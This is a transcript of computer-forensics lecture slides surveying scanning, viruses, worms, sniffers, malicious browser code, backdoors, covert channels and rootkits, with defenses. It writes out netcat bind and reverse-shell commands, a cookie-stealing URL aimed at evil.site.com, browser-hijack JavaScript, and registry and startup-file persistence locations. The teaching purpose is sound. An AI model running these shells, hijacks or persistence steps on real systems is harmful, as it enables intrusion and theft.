Viruses, Worms, Malicious Mobile Code, Trojans, Rootkits
Download
Report
Transcript Viruses, Worms, Malicious Mobile Code, Trojans, Rootkits
Malware:
Scanners, Sniffers, Viruses,
Worms, Mobile Code
COEN 252 / 152: Computer Forensics
Scanning
Wireless Scanners
War driving: Finding Wireless Access Points
Normal WLAN needs < 100 m to access point
to function well.
Good antenna can get a signals from miles
away.
Omni-directional antenna make war driving easy.
Directional antenna yield better results.
Can build a good one out of a Pringles box.
Scanning
Home-made War Driving Antenna
Scanning
War driving goal:
Locate WLANs
Determine Extended Service Set Identifier
(ESSID)
Access points transmit beacon packets
approximately every 100 msec.
Scanning
Active Scanning:
Broadcast 802.11 probe packets with ESSID of “Any”
Implemented by netstumbler.
Or Windows XP SP 2.
Listening for Beacons
Put wireless card into the monitor mode.
Read all packages.
AKA rfmon
Implemented by Wellenreiter, Kismet,
Forcing Deauthentication
Some WLANs ignore probes with an ESSID of “any”.
First, get MAC address of access point.
Tool sends a wireless deauthenticate message to client with
spoofed MAC of access point.
Clients now need to reassociate, revealing the ESSID.
Scanning
Hardening
Set ESSID to something that does not contain the
name of your organization.
Configure access points to ignore probe requests
that don’t include the ESSID.
Use stronger authentication mechanism.
Do not rely on MAC address alone, since this can be
spoofed.
Switch from WEP to WPA
Reset transmission power of access points.
Scanning
War Dialing
Looking for modems by dialing all numbers
of an organization.
Target are ill-configured modems.
Especially those connected to computers with
remote control products such as VNC,
psAnywhere, Mini Remote Control, Laplink
Gold, …
Scanning
Network Mapping
(Assume that attackers have gained access to the target system.)
Sweeping:
Attempting to ping all possible addresses.
Port mapping:
Identify services listening on ports:
TCP Connect Scan
Tries to complete TCP threeway handshake.
TCP Syn Scan
Attacker sends Syn, but does not ack to the Syn-Ack
response by the target.
(Many systems do not log these interrupted connection
attempts.)
Could result into an accidental DOS attack, since target
buffers these attempts waiting for completion. Attacker could
send Reset instead of the final Ack to avoid this.
Scanning
Network Mapping
Port mapping:
Identify services listening on ports:
Protocol Violators:
TCP FIN
Attacker sends FIN packet.
Target supposed to send RESET packet, if port is closed.
Target does not send anything back if the port is open.
Xmas Tree Scan:
Attacker sends packets with URG, ACK, PSH, RST, SYN, and
FIN flags.
Null Scan:
Attacker sends packet without any flags set.
Closed port sends RESET, listening port sends nothing.
Scanning
Network Mapping
Port mapping:
Identify services listening on ports:
Protocol Violators:
TCP ACK Scan
“Firewall Friendly”: Stateless firewalls will only let
TCP packages through with the ACK flag set.
If packet passes through the firewall, then the
internal system answers with a RESET packet.
Response of target is somewhat OS dependent.
Scanning
FTP Bounce Scans:
Goal: Source IP address does not show up in target logs.
Exploits old FTP option (sometimes available with printers that support
FTP):
FTP server allows a user to connect to them and requests that
the server send a file to another system.
Attacker requests that a file is sent to every port on the target.
If the target port is open, then the FTP server tells the attacker
that it opened the connection, but could not communicate.
If the target port is closed, then the FTP server tells the
attacker that it could not communicate with the target.
Scanning
Idle Scanning
IP header includes a field “IP Identification”.
Bunches together a bunch of fragments.
Windows increases IP ID by one whenever it needs a new
number.
Attacker first identifies a system that is being blamed.
Attacker then determines the current IP ID at the blamed
system.
Attacker then sends fake message purporting to be from the
blamed system to the target.
Target will increment IP ID number at the blamed system if
it sends a reset.
Attacker determines whether the IP ID number has
increased.
Scanning
target
SYN
scapegoat
Scanning
ACK IP-ID = 5
Scanning
SYN to TCP port
12345
Scanning
SYN-ACK from Port
12345
Scanning
Port open: Reset, IPID = 6
Scanning
SYN
Scanning
SYN-ACK
IP-ID = 7
Scanning
Aha:
Target must
have sent a
reset attack.
Virus: The Principle
Virus attaches itself to a host that can
execute instructions contained in the
virus.
When the host is invoked, the virus
copies itself to other locations on the
system.
Executables
Companion Infection Technique
OS will call the virus when the user requests the
companion file.
Windows:
Virus is Notepad.com to hide as Notepad.exe.
Set the hidden attribute to prevent the virus from being
seen.
Launch the true notebook.exe file from the virus.
If the user selects Start Run and types in notebook,
then windows starts the virus (notebook.com instead of
notebook.exe)
Executables
Companion Infection Technique
Windows:
Virus renames Notepad.exe to Notepad.ex_
and hides it.
Virus takes the place of Notepad.exe.
Works with shortcuts.
Used in the Trilisa virus / worm (2002)
Executables
Companion Infection Technique
Virus uses alternate data stream feature of
NTFS:
Streams look like one file in explorer and
directory listings.
System activates the default stream, the virus.
Virus calls alternate stream.
Win2KStream Virus (2000)
Executables
Overwriting Techniques
Virus replaces part of an executable.
Usually the executable looses functionality.
Users will now that there is something wrong.
Prepending Techniques
Virus placed in front of executable.
After virus executes, host program is called.
Very easy for .com files.
Easy to clean files.
Bliss virus had a disinfect mode built into it.
Used by the NIMDA worm.
Executables
Appending Infection Technique
Insert itself at the end of host file.
Add a jump at the beginning of host file.
Stealth Techniques for Prepending and
Appending:
Compress host.
When virus calls hosts, host is uncompressed into
RAM.
Fill up total package (virus, compressed host) to
same size as original host.
Change filler so that checksum is not changed.
Boot Sector Modification
Target Master Boot Record or Partition Boot Sector.
Michelangelo Virus (1991).
Replaced MBR boot strap to elsewhere on disk.
First the virus loads itself into memory, then it passes control to the
original MBR boot sector.
Places itself into all boot sector of all floppies.
Memory-resident copy of the virus is attached to low-level BIOS
drivers.
Gets called when these are executed.
Can no longer spread under WinNT, Win2K, WinXP, only wreak
havoc, e.g. by overwriting the sectors right after the partition boot
sector.
Boot Sector Modification
Michelangelo Virus (1991).
Bios initializes hardware
and starts drivers.
MBR executes and reads
partition table.
PBS locates OS start
files.
Infection of Document Files
Many software use Macros:
MS Office, WordPerfect Office, StarOffice,
OpenOffice, AutoCAD, Excel, …
WinOffice runs code in subroutines
Document_Open()
Document_Close()
AutoExec()
….
These subroutines are executed with every
document.
Infection of Document Files
Melissa (1999):
Resides in Document_Open()
Copies itself into the Normal.dot file.
Normal.dot is processed whenever MS Office
starts up.
Melissa changed the Document_Close() routine.
http://www.cert.org/advisories/CA-1999-04.html
Infection of Document Files
Excel Version:
Virus infects Personal.xls
This file can contains macros and is used
whenever excel runs.
Laroux (1996) used auto_open()
subroutine to execute whenever an excel
file was opened.
Infection of Document Files
Frequent macro targets in MS Office:
AutoExec()
AutoClose()
AutoOpen()
AutoNew()
AutoExit()
FileClose()
FileOpen()
FileNew()
Other Targets
Source Code
Scripts
Visual Basic Scripts (.vbs) used by OS:
Startup.vbs
Exec.vbs
Shell scripts, Perl scripts
Java Class Files
Platform independent viruses
Propagation Techniques
Removable Storage
Boot sector viruses, executable viruses
Yamaha’s CD-R drive firmware update contained the
Chernobyl virus.
Email attachments
Shared directories
Windows file sharing via Server Message Block
(SMB) protocol.
Network File System shares
P2P services such as Gnutella or Morpheus
Anti-Virus Defense
Antivirus software on gateways:
User workstations
File servers
Mail servers
Application servers
Border firewalls
Handhelds.
Anti-Virus Defense
Virus signatures
Looks for small patterns indicative of a known
virus.
Polymorphic viruses
Heuristics
Looks for programs with bad behavior:
Attempts
Attempts
Attempts
Attempts
…
to
to
to
to
access the boot sector
locate all files in a directory
write to an exe file
delete hard drive contents
Anti-Virus Defense
Integrity Verification
Generate database of hashes of important files.
Recalculate these hashes and compare them to
known values.
Configuration Hardening
Least privilege
Minimize active components.
Set warnings (e.g. against macros)
User education
Anti-Anti-Virus Defense
Stealthing
Hide virus files.
Intercept scanning of infected files.
Slow rate of infection.
…
Polymorphism and Metamorphism
Change order of instructions in virus code
Use equivalent code (increment = subtracting with
-1)
Encryption of most of the virus body.
Slightly change functionality of virus as it spreads.
Anti-Anti-Virus Defense
Antivirus software deactivation
Kill processes known to be antivirus
processes.
Disable internet access to antivirus
vendor’s pages.
Change security settings (e.g. allow Word
macros to run)
Worms
Worms:
Propagates across a network
Typically, does not require user action
for propagation.
Virus:
Infects files.
Typically requires user interaction.
Worms
Worm Components
Warhead
Propagation Engine
Target Selection Algorithm
Scanning Engine
Payload
Worm Warhead
A piece of code that exploits a
vulnerability on the target system
Exploits such as Buffer Overflow Exploits
File Sharing Attacks
E-mail
Common Mis-configurations
Worm Propagation Engine
After gaining access, the worm must transfer
itself to the target machine.
Some worms are completely contained in the
warhead.
File Transfer Mechanisms
FTP
TFTP
HTTP
SMB (MS Server Message Block)
Windows file sharing
Unix servers running SAMBA
Worm Target Selection
Algorithm
Once the worm has gained control of a
target, it starts looking for new targets.
E-mail addresses
Host lists
Trusted Systems
Network Neighborhood
DNS queries
Randomly selected ip address.
Worm Scanning Engine
Once targets are identified, the worm
scans for the original vulnerability.
Worm Payload
Some specific action done on behalf of
the attacker.
Opening up a backdoor.
Planting a distributed denial of service
attack.
Performing complex calculations:
password cracking
math research (actually happened)
Worm Spread
Worm spread is limited
Diversity of machines
“Tiny Worm”
targeted only machines running security software from a
medium company
was successful in infecting most machines with that
software.
Worms can contain support for multiple entry methods.
Too many victims crash
Fast worms can cause network congestion
Worm Trends
Multiplatform worms
Multiexploit worms
Zero-day exploit worms
Fast-spreading worms: Warhol / Flash
pre-scan targets
Polymorphic worms
No chance to patch
Change appearance
Metamorphic worms
Change functionality
Worm Defenses
Ethical (?) Worms
Antivirus tools
Fast patching services
Firewalling
Block arbitrarily outbound connections
Prevents spreading
Establishment of Incident Response
Capabilities
Sniffers
Sniffers: a program that gathers traffic from
the local network.
Primary attack example:
Passive Sniffing:
Sniffers look for authentication information from cleartext protocols such as ftp or telnet.
Sniffer only gathers packets but does not change the
network.
Active Sniffing:
Sniffer changes network settings.
Example: ARP poisoning in order to route traffic through
the machine with the sniffer.
Sniffers
Active Sniffing Strategies:
Used to circumvent switches passing packets on only on the relevant links.
MAC Flooding:
ARP Spoofing:
Switches contain a Content Addressable Memory (CAM) table that maps MAC
addresses and physical ports.
MAC flooder sends a flood of traffic with random spoofed MAC addresses.
When CAM is exhausted, switches either fail open (become hubs) or fail closed
(stop working).
Attacker sends fake ARP messages to change ARP mappings.
Port Stealing:
Attacker sends numerous spoofed packets with MAC of the gateway.
Switch maps the MAC of gateway to the port on which the attacker sits.
Victim sends packets to the attacker, who buffers them.
Attacker finally sends an ARP request to clear the switch’s mapping.
Gateway responds to the ARP request. This causes the switch to remap the
gateway’s MAC to the proper port.
Attacker now sends buffered packets to the gateway.
Sniffers
Active Sniffing Strategies:
DNS spoofing
Attacker sniffs DNS request from the line.
Victim tries to resolve a name using DNS.
Attacker sniffs the request and sends fake DNS
answer.
Victim sends traffic now to attacker.
Sniffers
Active Sniffing Strategies:
Sniffing HTTPS and SSL with man-in-the-middle
attack.
Attacker uses DNS poisoning to reroute victim’s requests
to his website.
Victim establishes SSL connection to the attacker.
Attacker proxies the connection and sends certificate of
his own making to victim.
Victim’s browser / SSL client complains about invalid
certificate.
Error message is typically something like: “You are
currently not trusting this authentication authority.”
Naïve user accepts.
Sniffers
Active Sniffing Strategies:
TCP Nicing
Attacker injects tiny TCP window
advertisements.
Victim slows down TCP rate and sniffer can
keep up.
Malicious Mobile Code
Mobile Code
Light-weight code that is downloaded from
a remote system and executed locally with
none or little user intervention.
Examples:
Java Applets
JavaScripts
Visual Basic Scripts
Active X controls
Malicious Mobile Code
Targets of malicious codes:
Monitoring of browser activities.
Obtaining access to file system.
Infection with a Trojan horse.
Hijacking web browser.
…
Malicious Mobile Code
Target Applications
Web-browsers (most important target)
E-mail readers
Either directly or because they use the installed
browser to read html messages.
XML-based protocols
Web Service Architecture
Malicious Mobile Code
Browser scripts:
Use scripting languages such as JavaScript,
JScript, VBScript, …
Malicious Mobile Code
Attack code
Can exhaust resources.
By creating an infinite series of dialogue boxes.
By creating a form and fill in an infinite number
of characters.
Hijack the browser:
Takeover browser process.
Malicious Mobile Code
Browser Hijacking
Use the onunload( ) function:
Can be enhanced by resizing the window to fill the
screen:
<body onunload=“window.open(‘trap.html’))”>
self.moveTo(0,0);
self.resizeTo(screen.availWidth,screen.availHeight);
Can be enhanced with popup windows.
Add bookmarks:
window.external.addFavorite(‘http://www.cse.scu’,’Info’);
Malicious Mobile Code
Stealing cookies via browser
vulnerabilities
Browser automatically supplies cookies
associated with the domain of that
website.
These cookies can contain valuable
information.
Including authentication.
Malicious Mobile Code
IE 5.01 vulnerability:
Create server-side program capable of reading
cookies.
Compose a URL that would fool the browser into
thinking that the site visited belongs to a different
domain.
http:// evil.site.com%2fget_cookies.html%3f.boa.com
is translated into
http://evil.site.com/get_cookies.html?.boa.com
IE 5.01 would think that the top URL belongs
to the boa domain and provide the cookies.
Malicious Mobile Code
Capturing cookies
With tricky URLs (see above)
URL can be hidden in a javascript
command or in a hidden region of html
code.
Malicious Mobile Code
Mozilla had a vulnerability that
executed javascript in the URL.
Malicious Mobile Code
Browsers allow Javascript in URL if
preceded by javascript:
Malicious Mobile Code
Browsers allow Javascript in URL if
preceded by javascript.
Change javascript in URL to retrieve
cookies.
Malicious Mobile Code
XSS (cross scripting) attack
Authors injects malicious code into a
website.
Browsers of visitors to this website will
execute the code.
Malicious Mobile Code
XSS (cross scripting) attack
Vulnerable search engine does not strip out the
JavaScript script:
Search engine sends the script back to victim’s browser.
Victim’s browser executes JavaScript.
Browser pop-ups alert with cookie values.
Attacker needs to trick the victim into using this URL.
Malicious Mobile Code
XSS (cross scripting) attack
Assume victim has interactions with a vulnerable
website.
Attacker crafts a link, sends it to the victim (e.g.
via email) and tricks the victim into clicking on the
link.
Victims browser uses the attacker-provided URL to
go to the vulnerable web server.
Web server “reflects” JavaScript back to victim’s
browser.
Victim’s browser executes JavaScript (because it
trusts the vulnerable web server.)
Attack JavaScript payload might be transmission of
cookies.
Cookies can then be used to hijack a session, …
Malicious Mobile Code
XSS (cross scripting) attack
Malicious script can also be embedded in
html documents.
Malicious Mobile Code
Script sends invisible request to evil.scu.edu
containing cookies.
Attacker’s cgi script on the evil side processes
the cookies.
Stolen cookies can be used to clone
connections.
Malicious Mobile Code
Defenses on Server Side
Input filtering
Remember, all input is (potentially) evil.
This is very hard, since scripts can be hidden very well.
Output filtering
The attack scripts needs to be reflected to the victim. So,
this works.
Malicious Mobile Code
Defenses on Client (= Browser) side
Never surf the internet with administrator
privileges.
Disable scripts.
IE explorer introduced security zones to automatically
disable scripts for general domains.
Malicious Mobile Code
Active X Controls
Part of Common Object Model COM
Have the same powers as a normal
program
Microsoft Agent allows inclusion of animated
and interactive cartoon characters in web
pages.
Are executed with the same permission set
as the browser.
E.g. administrator privileges.
Malicious Mobile Code
Active X-controls can be
cryptographically signed.
Possible to use social engineering to get
users to accept the active X-control.
For example, sign certificate by unknown
certification authority.
Malicious Mobile Code
Browser Plug-Ins (a.k.a. Browser Helper
Objects (BHO) for IE.)
Extends functionality of IE.
Google search bar is an BHO
Preferred by writers of spyware.
Gator
Xupiter
Have hidden functionality
Check with BHODemon
Malicious Mobile Code
Malicious Mobile Code
Exploits in Non-malicious ActiveX controls
Some ActiveX controls are only designed for local
use since they access system resources.
Could mistakenly be designated as safe for scripting.
A hostile web-site can then call them in its html code.
Eyedog (1999)
Scriptlet.Typelib (1999)
Some ActiveX controls are exploitable.
Old Macromedia flash player when provided with a
carefully crafted input string.
Malicious Mobile Code
Java Applets
By default, run in a sandbox.
Browser invokes Java plug-in.
If not signed, Java Runtime Environment (JRE)
runs it in a sandbox.
If signed, java.policy file determines what
happens.
Attackers can use social engineering to get
users to run bad java applets.
Historically, there were exploits in the JRE.
Malicious Mobile Code
Java Runtime Engine exploits:
Brown Orifice (2000)
Redirection of browsing session to an arbitrary
server (2002)
Applet was able to run as a web server with full access
to the victim’s file system.
Van der Wal: applets used to access external URLs could
bypass network access restrictions.
Opera browser crash (2003)
Malicious applet invoked Opera JRE class that crashed
when provided with a long input string.
Malicious Mobile Code
E-mail clients can function essentially as
a regular web browser.
All mobile code exploits function for
email clients.
Javascript can execute by merely
previewing the email.
BubbleBoy and Kak worms spread via
email messages.
Malicious Mobile Code
Web Bugs
Tiny image within an html document.
Lead to download http request.
http request comes with source IP.
Used by advertisers.
Malicious Mobile Code
Web bug privacy attack
Attacker sets cookies with unique ID.
Spam with web bug
Call to web bug resource comes with cookie
attached.
Call to web bug resource comes with email
address attached.
Initial session is no longer anonymous.
Malicious Mobile Code
Exploiting Browser Vulnerabilities
Assumed to be less dangerous, since victim needs
to be tricked to go to a bad site.
Example: Download.Ject flow in Internet Explorer
(2004)
Attacker took over several e-commerce servers.
An innocent victim surfed to some of these sites.
E-commerce server responded with a webpage that
exploits the browser.
Browser exploit downloads keylogger.
Keylogger gathers financial data from victim’s computer
use.
Keylogger sends financial data to attacker controlled
website.
Malicious Mobile Code
Exploiting Browser Vulnerabilities
Example: IFRAME flaw (2004)
Attacker took over an ad-server.
Victim’s computer downloaded ad.
Backdoors
Backdoor:
A program that allows attackers to bypass
normal security controls on a system,
gaining access to which they are not
entitled.
Backdoor Types
Local Escalation of Privilege
Remote execution of individual
commands.
Remote command-line access.
Remote control of the GUI.
Backdoor Installation
Attacker has compromised the system
Virus, worm, or malicious mobile code
installs the backdoor.
Social engineering: Tricking the victim
into installing the backdoor.
...
Starting backdoors
automatically
Attacker wants to maintain access to the
system.
Backdoor needs to restart whenever the
system restarts.
Methods are OS dependent.
Starting backdoors
automatically on Windows
Altering Startup Files and Folders
Registry
Task Scheduler
Starting backdoors
automatically on Windows
Startup folders and files
Autostart folders for individual users and all
users.
Starting backdoors
automatically on Windows
Use:
win.ini
system.ini
Modify “shell=explorer.exe” on Win9x
wininit
winstart.bat (Win9x)
Autoexec.bat (Win9x)
Config.sys (Win9x)
Starting backdoors
automatically on Windows
Registry keys start programs on login or
reboot:
HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\
RunServicesOnce
RunServices
RunOnce
Run
RunOnceEx
Starting backdoors
automatically on Windows
HKCU\SOFTWARE\Microsoft\Windows\Curr
entVersion\
RunServicesOnce
RunServices
RunOnce
Run
RunOnceEx
Starting backdoors
automatically on Windows
Registry keys start programs on login or
reboot:
HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Userinit
HKLM\SOFTWARE\Microsoft\Windows\CurrentVers
ion\ShellServiceObjectDelayLoad
HKLM\SOFTWARE\Policies\Microsoft\Windows\Sys
tem\
Scripts
Explorer\Run
Starting backdoors
automatically on Windows
Registry keys start programs on login or
reboot:
HKCU\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Userinit
HKCU\SOFTWARE\Microsoft\Windows\CurrentVers
ion\ShellServiceObjectDelayLoad
HKCU\SOFTWARE\Policies\Microsoft\Windows\Sys
tem\
Scripts
Explorer\Run
Starting backdoors
automatically on Windows
Registry keys start programs on login or
reboot:
HKCR\Exefiles\Shell\Open\Command
Indicates programs that will be run every time
another .exe is run.
Starting backdoors
automatically on Windows
Use the task scheduler
Check scheduled tasks with autoruns from
Sysinternals
Starting backdoors
automatically on Unix
Modifying the init daemon
Modifying system and service
initialization scripts
Modify the internet daemon script
Change user startup scripts
Schedule jobs with Cron
Starting backdoors
automatically on Unix
Modify the init daemon
init daemon is the first process to start.
uses /etc/inittab to find other processes
that need to be started
attacker merely adds line to inittab.
Starting backdoors
automatically on Unix
Modify system and service initialization scripts
About 20+ system scripts
Located in /etc/rc.d or /etc/init.d
Or merely plant a backdoor in an initialization
script for another service.
E.g. ppp daemon
for PPP modem dial-up connections
inetd
network daemon
change /etc/inetd.conf
Starting backdoors
automatically on Unix
Adjust user startup scripts
.login
.cshrc
/etc/profile
.logout
.xinitrc
.xsession
Starting backdoors
automatically on Unix
Schedule jobs with Cron
Backdoor Defenses
System integrity tools like tripwire
Apply to all resources
Backdoor with netcat
netcat compiles into executable nc.
On the victim:
nc –l –p 2000 –e cmd.exe (Windows)
nc –l –p 2000 –e /bin/sh (Unix)
Sets up a listener on port 2000.
On the attacker:
nc [victim address] 2222
gives command shell.
Backdoor with netcat
Only works if attacker can establish a
TCP connection to the port on the
victim.
Firewalls can block this.
Backdoor with netcat
Use an open door in the firewall and initiate
connection on the victim’s machine:
Shoveling a shell
On the attacker’s machine:
nc –l –p 80
netcat listener on port 80
On the victim’s machine:
nc [attacker’s address] 80 –e cmd.exe
initializes outgoing connection to attacker
then executes a shell
Backdoor with netcat
Alternatives to netcat
cryptcat
Tini
Q
Bindshell
Md5bd
UDP_Shell
TCPshell
Crontabbackdoor
Virtual Network Computing
Remote GUI tools
Virtual Network Computing (VNC)
Windows Terminal Services
Remote Desktop Service
Citrix MetaFrame
PCAnywhere
Dameware
Back Orifice 2000
SubSeven
www.megasecurity.org
Virtual Network Computing
VNC server allow to shovel a shell.
Can be remotely installed:
Attacker has remote shell access on victim
Attacker installs copy of VNC on his machine
Attacker exports the registry keys associated with
VNC to the victim
Attacker moves four files to victim
Attacker adds registry changes to victim
This will display a VNC installation successful message on
the victim
Attacker starts VNC
Defenses against Backdoor
Shell Listeners
Use firewalls
Look for open ports.
Filter traffic in both directions.
Firewall individual machines.
On the network (Nmap)
Or with a trusted tool (on CD) locally.
Close unneeded ports.
Backdoors without ports
ICMP backdoor
ICMP messages don’t use ports.
Firewalls need to let some ICMP messages
pass.
ICMP messages can carry a few bytes of
payload.
Backdoors without ports
ICMP backdoors:
Loki
007shell
ICMP Tunnel
available at www.packetstormsecurity.org
for free.
Non-Promiscuous Sniffing
Backdoors
Sniffer in non-promiscuous mode sniffs
for commands in packets destined for
the local machine.
Non-Promiscuous Sniffing
Backdoors
Cd00r
sniffs for TCP packets to ports X, Y, Z
syn packets to X, Y, Z: sniffer activates backdoor.
backdoor opens TCP port and shovels shell.
the ports are not open
This can be detected.
Is however unnecessary with a sniffer
“Future releases” will discontinue this practice.
Just craft special packets instead.
when backdoor closes, port is closed.
Promiscuous Sniffing
Backdoors
Promiscuous sniffer can gather packets
send to any machine on the same LAN
segment.
IP address of suspicious traffic does not
have to originate on the victim machine.
Promiscuous Sniffing
Backdoors
Promiscuous Sniffing
Backdoors
Attacker has compromised the DSN
server and installed a promiscuous
sniffing backdoor there.
Promiscuous Sniffing Backdoor
Attacker sends a
packet to the
webserver at port
80.
Messages passes
through the firewall.
Promiscuous Sniffing Backdoor
Sniffer on the DSN
server sniffs the
package.
Webserver does not
know what to do
with a malformed
request.
Firewall:
Message to
webserver.
Let pass.
Promiscuous Sniffing Backdoor
Backdoor on DSN
reacts to packet.
Sends back message
to attacker.
Spoofed return
address from
webserver.
Firewall lets it pass.
Firewall:
Message from
webserver.
Let pass.
Covert Channels
Covert Channels hide the fact that
information passes through them.
Tunneling:
Protocol that carries data from another
protocol.
Example: SSH
SSH allows to set up a secure connection
between two computers.
Can use this connection for insecure protocols
such as ftp.
SSH protects these insecure applications.
Covert Channels
Example: LOKI
Source: Phrack 51
Attacker install Loki server (a.k.a. LokiD) on victim.
Attacker runs Loki client on his own machine.
Loki tunnels attackers commands:
Attacker writes shell commands.
Loki client sends out several ICMP packets to victim that contain part of
the commands.
Loki server receives ICMP packets and extracts attacker command.
Loki server executes them.
Reversely, Loki server wraps responses in ICMP messages, sends them
to the Loki client, which displays them.
Port scanners or netstat cannot detect Loki since ICMP does not
use ports.
Only traces are the Loki server running as root and ICMP
messages going back and forth.
Covert Channels
Example: Reverse WWW Shell
Source: www.thc.org
Attacker needs to install the reverse WWW shell
on victim’s machine
Program spawns a child every day at a specific time.
Executes a local shell and connects to www server
owned by the attacker.
This looks to a firewall like an ordinary http request.
www server sends back html resources that the reverse
shell interprets as shell commands.
After a delay of 60 seconds in order to avoid exposure.
Covert Channels
Example: GoToMyPC
Commercial, remote control tool that uses
reverse WWW shell technology.
Security depends on authentication
strength (password).
Covert Channels
Tunnel through any TCP / IP traffic
Insert data in unused or misused fields in
the protocol header of packets, such as:
IP Identification.
TCP sequence number.
TCP acknowledgment number.
Covert Channels
Tunnel through any TCP / IP traffic
Insert data in unused or misused fields in the protocol header of packets,
such as:
Sequence Number.
Can even be used with bouncing:
Bounce Server
1. Client generate TCP SYN packet with
spoofed source address of bounce
server.
Sequence number is set to one less
than the ASCII code of the character to
be transmitted.
Covert Channels
Tunnel through any TCP / IP traffic
Insert data in unused or misused fields in the protocol header of packets,
such as:
Sequence Number.
Can even be used with bouncing:
Bounce Server
2. Bounce Server answers with an ACK
and SYN. The ACK contains the
Sequence Number of the first packet
increased by one.
Receiver
Covert Channels
Tunnel through any TCP / IP traffic
Insert data in unused or misused fields in the protocol header of packets,
such as:
Sequence Number.
Can even be used with bouncing:
Bounce Server
2. Receiver sends back a SYN/ACK or
RESET, obtains the character from the
Sequence Number field (now the
correct character).
Receiver
Defenses against backdoors
without ports
Backdoors still create running
processes.
Backdoors still create network packets.
Backdoors might put MAC cards into
promiscuous mode.
Trojan Horses
a program with added functionality.
Trojan Horses
Hiding names
change name (of netcat, vnc, ...)
play with windows suffixes
just_text.txt
This is ONE word with a bunch of spaces in it
Use the .shs suffix (suppressed by system)
.exe
just_text.txt
Shell scrap object
.shs
Windows uses the suffix to decide what to do
with a file.
Trojan Horses
Hiding names
take someone else’s name.
overeager system administrators might even remove the
legitimate program thinking it might be your fake
program.
windows does not let you kill program with certain
names.
regardless of content
csrss.exe, services.exe, smss.exe, System, System Idle
Process, winlogon.exe
There might be more than one legitimate process named
winlogon or csrcc.exe
Trojan Horses
Hiding names
use common typos of important files for a
Trojan
ifconfig instead of ipconfig.
Trojan Horses Defenses
Pskill will kill any horse / process.
Fport and lsof will find open ports
associated with the horse.
Tripwire could find substitutes for
executables.
Filter email attachments that are
executable.
Wrappers
Wrap malware in a good program.
A.k.a. binders, packers, exe binders, exe
joiners.
AFX File Lace, Elite Wrap, Exe2vbs, PE Bundle,
Perl2Exe, Saran Wrap, TOPV4, Trojan Man
Combat with
Anti-virus software
File System Integrity checkers (Tripwire)
Posted MD5, SHA1 values of downloads
Definition of Rootkit
Rootkits
Rootkits are Trojan horse backdoor
tools that modify existing operating
system software so that an attacker can
keep access to and hide on a machine.
Unix User Mode Rootkits
Rootkits are bundled packages
consisting of:
Binary replacements that provide backdoor
access.
Binary replacements that hide the attacker.
Other tools for hiding
Additional Odds and Ends
Installation Script
Unix User Mode Rootkits: LRK
Around since the early nineties.
version 6 is appearing.
Unix User Mode Rootkits: LRK
Backdoor Access:
Trojan login, rsh, ssh
Remote shell on a chosen port
Altered login, rshd, sshd
Same functionality, but with a special backdoor
password for “rewt” that gives root access.
altered inetd, tcpd
Local privilege escalation backdoors:
chfn, chsn, passwd, su
Unix User Mode Rootkits: LRK
Binary Replacements that hide the
attacker:
Processes
ps
top
pidof
killall
crontab
Unix User Mode Rootkits: LRK
Network use
Files
netstat
ifconfig
ls
find
du (omits space taken by hidden files
Events
syslogd
Unix User Mode Rootkits: LRK
Other tools for hiding:
fix
resets the MAC times of trojaned system files.
pads files so that the CRC check matches the one of the
original files.
zap2, wtmp
blanks out / edits information in important files:
utmp, wtmp
stores data on users currently / ever logged in.
btmp
stores data on bad logins.
lastlog
stores data on last login for users
Unix User Mode Rootkits: LRK
Goodies
bindshell
creates a backdoor listener
attacker connects with netcat to the listener
sniffer
linsniffer grabs IDs and passwords for ftp,
telnet
Unix User Mode Rootkits: LRK
LRK Installation Script
makefile allows to choose configuration
No need to understand any of the
workings of LRK
installs in seconds / few minutes
Unix User Mode Rootkits: URK
Universal Root Kit
Functions on a variety of Unix variants
Has slightly less functionality than LRK
EFS2 Manipulations to hide
data
RunEFS, Defiler’s toolkit foil computer
forensics investigations on a UNIX machine.
RunEFS
adds pointers of good blocks to the bad blocks
inodes.
stores data in them.
Coroner’s Toolkit and derivatives don’t look at
these blocks.
EFS2 Manipulations to hide
data
Defiler’s toolkit destroys data that a forensics
tool can harvest.
shred and other overwrite tools destroy data in a
block.
Defiler’s toolkit destorys inode and directory
information as well.
Necrofile scrubs inodes clean
Klismafile overwrites directory entries associated with
deleted files.
This leaves blank spots in a directory.
This shows that someone used Klismafile.
Windows User Mode Rootkits
Windows File Protection (WFP)
Scans for changes to critical executables and
libraries.
Compares digital signatures of 1700 files to a protected
file
If WFP detects a change it searches for an
authorized file in different locations.
WFP can be altered
Windows Service Pack Installations (Update.exe)
Hotfix distributions (Hotfix.exe)
Windows Update Feature
Windows Device Installer
Windows User Mode Rootkits
Implementing user mode rootkits in
windows:
Use existing interfaces
Overwrite file
Use DLL injection and API hooking to
manipulate running processes in memory.
Windows User Mode Rootkits
Use existing interfaces:
FakeGINA
sits between winlogon and
msgina
Windows User Mode Rootkits:
Windows uses Graphical Identification aNd
Authentication (GINA)
Windows allows system administrators to
install third party GINA tools.
Attacker sets registry key
Windows ships with default GINA (msgina.dll)
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon
to install Fakegina
Fakegina gathers passwords, passes logon credentials to the
real msgina.dll.
Windows User Mode Rootkits:
Changing Files
Not so easy, since WFP protects system files
Changing WFP Settings
WFP configuration is stored in the registry
Attacker can change system file and then
1.
delete the version in DLL cache.
WFP cannot find a correct version.
Sends message to request system CD.
Administrator might ignore message
Windows User Mode Rootkits
Attacker can
2.
Alter the location of the Dllcache by
modifying the registry.
3.
WFP checks signatures and finds many
mistakes.
Log is full of warnings.
Turn off WFP by changing a registry key
WFP still active until reboot.
Warning message after reboot.
Windows User Mode Rootkits
Attacker can
4)
set the SFCDisable key to value
0xFFFFFF9D.
Completely disables WFP on Win2000
No dialog warning
Only a message that WFP is inactive.
Code Red II used method 4.
Windows User Mode Rootkits
In order to achieve stealth mode, the rootkit
must alter the execution path of the OS or
change the data structures directly.
Altering the execution path with HOOKS:
Windows User Mode Rootkits
Assume that user process lists a directory.
This involves calling various dll at the user
and at root level.
Windows User Mode Rootkits
API HOOKING
The application will load kernel32.dll
into its private address space.
Between memory addresses 0x00010000
and 0x7FFE0000.
Rootkit needs to overwrite any function
in Kernel32.dll.
This is called API HOOKING
Windows User Mode Rootkits
API HOOKING Method 1:
Import Address Table Hooking
Most applications that use the Win32 API use an Import
Address Table.
Each DLL is contained in the application’s image in the
file system in a structure called the
IMAGE_IMPORT_DESCRIPTOR
